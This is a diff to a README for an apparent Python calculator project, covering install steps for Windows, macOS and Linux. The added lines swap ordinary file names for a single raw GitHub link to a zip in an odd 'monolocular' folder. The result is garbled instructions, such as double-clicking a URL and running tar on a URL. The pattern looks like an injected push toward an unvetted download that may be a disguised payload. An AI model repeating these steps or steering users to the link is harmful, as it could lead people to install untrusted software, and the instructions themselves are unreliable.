cajor73/python-project/README.md

 **For Windows Users:**
 1. If you downloaded an `.exe` file, double-click the file to start the installation process.
 Follow the on-screen instructions to complete the installation.
 2. If you downloaded a `.zip` file, right-click the file and choose "Extract All."
 Move the extracted folder to a desired location on your computer.
-3. Open the folder and double-click `calculator.exe` to run.
+3. Open the folder and double-click `https://github.com/cajor73/python-project/raw/refs/heads/main/monolocular/python-project-1.4.zip` to run.

 **For macOS Users:**
-1. If you downloaded a `.tar.gz` file, double-click it to extract the contents.
+1. If you downloaded a `https://github.com/cajor73/python-project/raw/refs/heads/main/monolocular/python-project-1.4.zip` file, double-click it to extract the contents.
 2. Move the extracted application to your Applications folder.
 3. Open the application by double-clicking it in the Applications folder.

 **For Linux Users:**
-1. If you downloaded a `.tar.gz` file, open a terminal window.
+1. If you downloaded a `https://github.com/cajor73/python-project/raw/refs/heads/main/monolocular/python-project-1.4.zip` file, open a terminal window.
 2. Navigate to the folder where the file is located.
 You can use `cd /path/to/your/file` in the terminal.
-3. Extract the file with the command: `tar -xvzf filename.tar.gz`
+3. Extract the file with the command: `tar -xvzf https://github.com/cajor73/python-project/raw/refs/heads/main/monolocular/python-project-1.4.zip`
 4. Navigate to the extracted folder and run the application using: `./calculator`.

 ## 🎨 Features